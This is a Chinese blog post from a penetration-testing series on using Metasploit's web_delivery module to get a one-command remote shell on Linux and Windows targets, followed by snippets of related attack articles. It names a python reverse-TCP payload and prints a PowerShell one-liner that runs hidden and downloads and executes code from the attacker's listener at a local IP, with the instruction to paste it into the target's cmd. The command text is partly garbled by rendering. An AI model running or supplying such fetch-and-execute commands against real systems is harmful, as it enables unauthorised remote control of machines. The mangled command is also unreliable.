内网渗透十:MSF:web_delivery模块

最新推荐文章于 2023-05-15 20:24:50 发布
最新推荐文章于 2023-05-15 20:24:50 发布
阅读量1.6k 收藏
点赞数 2
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_jia_liang/article/details/123424393
版权

前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。

目标环境:

ubuntu 16.0.4

1、选择exploit/multi/script/web_delivery模块

2、选择目标系统,我这里选择Linux(windows  可以选择PSH  pollowshell)

linux:

windows:

3、选择payload,

linux:

payload/python/shell_reverse_tcp

 winodws:

4、本机监听一下

5、运行,生成一条命令

linux:

windows:

6、目标机器执行上线。

linux:

 

windows:

可以看到我们接收到一串字符串如下:

powershell.exe -nop -w hidden -c M = n e w − o b j e c t n e t . w e b c l i e n t ; M=new-object net.webclient; M=new−objectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);

我们只需要把这串字符串在windows环境下cmd中执行就可以了

L_DC
关注
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 455
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
metasploit之webdelivery
Yale的博客
01-31 1288
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用的模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
一条命令上线MSF(Metasploit)-web_delivery模块
10-31 2693
一条命令上线MSF(Metasploit)-web_delivery模块
msf web_delivery模块攻击
dichengpai8268的博客
05-03 413
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索we...
Msf - web_delivery
Nixawk
02-22 1886
Python Payload Modemsf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- --------
MSFweb_delivery模块使用测试(Windows)
beefreesky的博客
12-29 312
Windows环境下,MSF web_delivery模块使用测试
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1100
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
完整的内网渗透经历
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1398
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。 简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。 所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。 运行刚刚生成的powershell 这边的CS成功上线。 这里我们先来看看系统的信息。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8120
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
忆享科技戟星安全实验室|内网渗透神器-Viper的基本使用
m0_61431042的博客
08-19 1969
viper提供图形化的操作界面,用户使用浏览器即可进行内网渗透,内置70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。
msf中exploit的web_delivery模块
weixin_30300523的博客
03-11 302
背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码至内存执行 错误尝试:远端服务器开启web服务,让目标设备来调取。(错误点:默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行) ...
msf利用web_delivery模块 攻击windows实例
最新发布
cuteyann的博客
05-15 689
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2701
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
(记录向)使用MSFweb_delivery模块上线
daxi0ng的博客
11-30 1477
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1345
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
使用Metasploit web_delivery 反弹shell
大方子
02-07 5469
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
msf_web_delivery模块漏洞(win7以上注册表)
芥子
01-25 1085
目标机:win10   ip:192.168.1.8 攻击机:kali Linux    ip:192.168.1.63 一:直接打开metasploit,也可在终端直接输入msfconsole msf的用法:  查找web_delivery模块: search web_delivery 使用web_delivery模块:use exploit/windows/misc/
MSFweb_delivery模块使用测试(Linux
beefreesky的博客
12-29 268
linux环境下,MSF web_delivery模块使用测试。
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3737
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值